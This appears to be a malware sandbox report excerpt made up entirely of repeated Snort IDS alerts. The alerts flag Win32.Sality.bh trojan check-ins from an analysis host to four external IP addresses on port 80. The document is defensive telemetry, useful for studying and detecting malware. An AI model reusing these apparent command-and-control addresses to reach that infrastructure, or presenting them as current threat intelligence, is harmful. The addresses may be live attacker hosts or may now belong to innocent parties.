        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49771 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49772 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49773 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49774 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49775 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49776 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49777 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49778 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49779 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49781 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49782 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49783 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49784 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49785 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49786 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49787 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49788 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49789 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49790 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49791 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49792 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49793 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49794 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49795 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49796 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49797 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49798 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49799 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49800 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49801 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49802 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49803 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49804 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49805 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49806 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49807 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49808 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49809 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49810 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49811 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49812 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49813 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49814 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49815 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49816 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49817 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49818 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49819 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49821 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49822 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49823 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49824 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49825 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49826 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49827 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49828 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49829 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49830 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49831 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49832 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49833 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49834 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49835 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49836 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49837 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49838 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49839 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49840 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49841 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49842 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49843 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49844 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49845 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49846 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49847 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49848 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49849 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49850 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49852 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49853 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49854 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49855 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49856 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49858 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49859 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49860 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49861 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49862 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49864 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49865 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49866 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49867 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49868 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49870 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49871 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49872 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49873 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49874 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49876 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49877 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49878 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49879 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49880 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49882 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49883 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49884 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49885 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49886 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49888 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49889 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49890 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49891 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49892 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49894 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49895 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49896 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49897 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49898 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49900 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49901 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49902 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49903 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49904 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49906 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49907 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49908 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49909 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49910 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49912 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49913 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49914 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49915 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49916 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49918 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49919 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49920 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49921 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49922 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49924 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49925 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49926 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49927 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49928 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49930 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49931 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49932 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49933 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49934 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49936 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49937 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49938 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49939 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49940 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49942 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49943 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49944 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49945 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49946 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49948 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49949 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49950 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49951 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49952 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49954 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49955 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49956 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49957 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49958 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49960 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49961 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49962 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49963 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49964 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49966 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49967 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49968 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49969 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49970 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49972 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49973 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49974 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49975 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49976 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49978 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49979 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49980 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49981 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49982 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49984 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49985 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49986 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49987 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49988 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49990 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49991 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49992 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49993 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49994 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49996 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49997 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49998 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49999 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50000 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50002 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50003 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50004 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50005 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50006 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50008 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50009 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:50010 -> 44.221.84.105:80
